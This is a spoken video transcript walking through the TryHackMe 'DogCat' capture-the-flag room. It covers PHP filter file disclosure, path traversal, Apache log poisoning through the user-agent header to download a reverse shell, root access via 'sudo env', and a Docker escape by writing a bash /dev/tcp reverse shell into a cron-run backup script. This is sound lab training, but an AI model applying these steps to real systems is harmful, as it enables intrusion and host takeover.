Hello everybody, my name is Optional and today we're going to be taking a look at DogCat on TryHackMe. It's quite an interesting box that requires LFI with a difference to gain our foothold. It was created by Jammy. So what we're going to do is we're going to walk on through and see what we can do. To start off, we are told, I made a website to look at pictures of dogs and or cats. So first thing we're going to do is we're going to run our Nmap. We're going to do SC for standard scripts. We'll do SV for system versions. We'll drop the IP address and we'll do output normal. Just because it's good practice to do outputs. Scans, Nmap. And yeah, so this will take a little while to, or actually this room doesn't take too long to run. But just to save time, I have already ran it. So let's take a look. So we can already see we have two ports open. I have HTTP on port 80 and SSH on 22. Now, as we know from where this room has already been done, we have a simple website. So let's take a look. A gallery of various dogs and or various dogs or cats. So if you click dogs, you're going to get dog. If you do cat, and so on and so forth. Quite a nice little website. It's cute. But the main thing we're taking a note of is we've got view equals dog. So what happens if we change this to index? Sorry, only dogs or cats are allowed. Okay, so that's nothing too crazy. Let's see if we can manipulate this at all to give us what we want. So let's try this, and we still get the only dogs or cats allowed. So the way I went around initially doing this is I thought we could potentially convert this with PHP. So we've got view equals, and if we do PHP tac filter / convert dot base 64 tac encode, and then if we do cat resource equals index, there we go. So we can actually pull files like this. We are going to get a couple of errors and it's not going to like it, okay? This is perfectly fine and it's what happens. However, what we can find as well, if we do flag, is our first flag. So if we were to base 64 decode this file here, it would show that we have a flag actually. Due to the write-up, we're not going to, but I will show you when we get on the box that we can grab it. The key bit of information we will grab from this though is we will grab the index page. And if we go over to CyberChef just here, and we drop that in, and why is that being like so? There we go. So we can decode this and it will show us everything we need. So this is what we're looking at with function contain string return false. We've got a couple of PHP variables, right? That's what we know. So we know we have view already, which is returning what we're selecting. We have ext, which is appending .php to everything, which is why we actually gained some errors. So we've got view and we've got ext. So as we can see, it's looking for dog or cat. Okay, contains string view cat. So as long as we have cat or dog in this, it's going to keep going. Okay. So the next stage that I'm going to attempt to do is we're going to try and see if we can gain access to logs poisoning. If you haven't done this already, I highly recommend you check out the LFI room, which I will flash up on screen and I will leave a link in the description for. However, what we will do is instead of using this, we're going to try and do some interesting magic. We'll say magic, but it's not. It's nothing special at all. So what we're going to do is we're going to do view equals, and then if we do a couple of double dots, and what this is basically saying, go back 4 times. So if you know terminal, which I'm assuming if you're watching this video or are doing this room, you do understand how command line works. This is no different to doing cd or cat on that. And we're going to do, let's say for example, we want to do etsy. So if we do etsy, if we do cat, because it's got to contain cat or dog, right? So this could be dog, this could be cat. And then if we do, what is it we're doing? We're going to do password, password, and then we're going to do ext equals. Okay, so there we can gain access to the file system, and this is just showing we actually have full access to the file system. Okay. So what we're going to do is we're going to now attempt log poisoning with what we know. So we know the location of the logs are going to be /var /log /apache2. Then we're going to do a cat access.log, if I can spell access right. And we're going to do ext equals. Now we have full access to our logs, okay? So quite standard in log poisoning, what we're going to do is we're actually going to copy this and just remove that. Quite common in log poisoning, what we will be doing is we'll put our command in here. So if we do something like lsla and then refresh this, we should at some point see our lsla. Now the main problem and difference between this and the LFI room is we can see that it's URL encoding it, which is a problem because it's going to stop our commands running. Okay. That wouldn't necessarily work anyhow, but the one key bit of information that we are going to pull from this file is that our user agent isn't actually being encoded. So what we can do is if we grab it with burp sweep, so we'll go here and we will, we'll just go to this page, which we've already got open. So we'll go to this page. And what we're going to do is we're going to do a couple of things. So we're going to do PHP file get contents. We're then going to open and do shell.php. We've actually done this the wrong way. So this needs to be file put contents. Okay. So if we do file put contents, shell.php, then we do file get contents, and this is where we're going to specify an IP address. So if we do 10.11.042 shell.php, so we're just going to pull a reverse shell. We're going to close this up like so, and before we send this, we're actually going to set up a couple of things. So we're going to cp/opt user share web shells php reverse shell. Now I've already changed this, so it's got our IP address in here, and we're going to be listening on port 1234. So if we move this to php to shell.php, we're going to set up a listener for that one, and we're just going to send this off, right? So it's not going to hit anything just yet. However, if we go to here, and we're going to actually disable this and refresh our page, we will see that we don't see a log here, which tells us, okay, it has this ran. And if we look on our listener, we're going to see port 80, we have had a GET request for shell.php. So the fun thing we're going to do now is we're going to use RL wrap, we're going to do netcat, and we're going to do 1234, right? So now if we go onto our home page and we go shell.php, we gain our shell access, okay? So that's perfect. So if we go into var html, which is where we are, if we do word count flag.php, it's 56 characters, which matches flag 1. Perfect, okay? Then if we go one back, there's flag 2, so we can also do word count flag 2, just to make sure that our word counts are lining up. So we got 23, which if we went back to the website and we're looking, I have deleted them because I didn't want to reset my progress because I blooded the room. So we've got flag 1 and 2 so far. Now if we do a who am I, we are data. If we do an ID, we are 33. Okay. So what we're going to do is we're going to see sudo tack out and see if we've got access, and we can actually use env. So if you're doing a room for the first time and you haven't encountered, say you've got access to a sudo command that you're not necessarily sure how to exploit, if you go onto gtfobins.github.io, and for this example we're using env, you type in what you'll be able to execute, and you can see it's got a sudo privesc. So all we have to do is copy sudo env bin sh, and now if we run who am I, we are root. Perfect. So if we cd to root, there is flag 3. Now there's one problem with this room, and this is something that caught a lot of people off guard. It's a very good room for it. There's a flag 4, and normally you'd assume, okay, I'm the end of the room, I am done. That just completely broke what I was working with, but you know what, we'll roll with it. So what we could potentially do here is we're going to look around the file system. So if we go into var, we see nothing interesting. If we look in opt, we see backups. Okay, so it doesn't take a rocket scientist to notice if we run hostname, we're in a Docker container, right? Normally, especially on a lot of challenge rooms, it should be, if you do hostname, it come up the box name. So this should come up with DogCat. No different how on Madness it will come up Madness. If you go on a couple of other rooms, it's going to come up with that room name, right? So what can we do? So if we look in backups and do lsla, we see, okay, so this tar file is has literally just been created. Ignore the hour difference. That tar file has just been updated. If we do tail tacf and backup.tar, let's see how that's going to work. I don't think it is going to work. We're just going to recall our listener actually. So let's just re-grab that because I just broke it by trying to run tail. So we're going to do sudo env, what was it, bin bash? Bin bash. Should have probably done bin sh just so we get our indicator. Let's just do that again. Sudo env /bin/sh. Clear. Export term equals xterm. So we should be able to run clear. Perfect. So if we go back to /opt/backups, is it backups? Yeah, it's cd opt cd backups. Then we can see, if we run again, okay, so this is being updated every minute. Okay, so this is being updated. So my theory when I attempted this initially was, okay, so something's being ran. We instantly see backup.sh here, right? So if we cat that, we can see tar cf root container backup backup.tar root container. So, and it's just dropping it here. Now, one thing we can do is if we do echo, so we're going to exploit this. So we can assume that there is a cron running on the host system. So if we do echo /bin bash close into backup.sh, and then if we go onto bash reverse shells, we're just going to grab this from High on Coffee. It's a great website to pull some reverse shells from. We're just going to use this one. So if we throw it in here, we're just going to change the attacker IP to 10.11.0.142. We're going to change our IP to 1001. We're also going to set up a listener on 9001, and we're going to echo that into backup.sh. So now if we do cat backup.sh, we are going to see our script. So this will hopefully, touch wood, be executed every minute. So we've got bin bash, bash taci, dev tcp 10.11.0.142 9001. So all we're doing now is we're going to wait until this clock hits 4:07. Hopefully we're going to see by a prompt here that we have executed and gained root. There we go. So now when we do who am I, we are root. If we do ID and hostname, our hostname looks a lot more familiar as we see. And we can cd clear export term equals xterm clear, and we can do word count flag4.txt 80 characters. That is the room. Right there we have completed DogCat. I'm not gonna lie, when I started doing this box, I clicked on it and I thought, okay, this is just gonna be another LFI room, but I was quite pleasantly surprised by the fact we had to use filter evasion to pull off our files. So yeah, I highly recommend you guys take a look at this room. It is a very good room. I feel like you won't be disappointed if you give it a go. If you haven't already, leave a like and subscribe to this channel. I will be trying to post a lot more on here. If you haven't already followed my Twitch stream, go ahead. The links are all down below. We've also started setting up a Discord community, so feel free to join along through the invite code that is in the description. Anyway guys, I would like to thank you for watching. I hope you enjoyed the video and have learned something. I will catch you in the next one. Goodbye.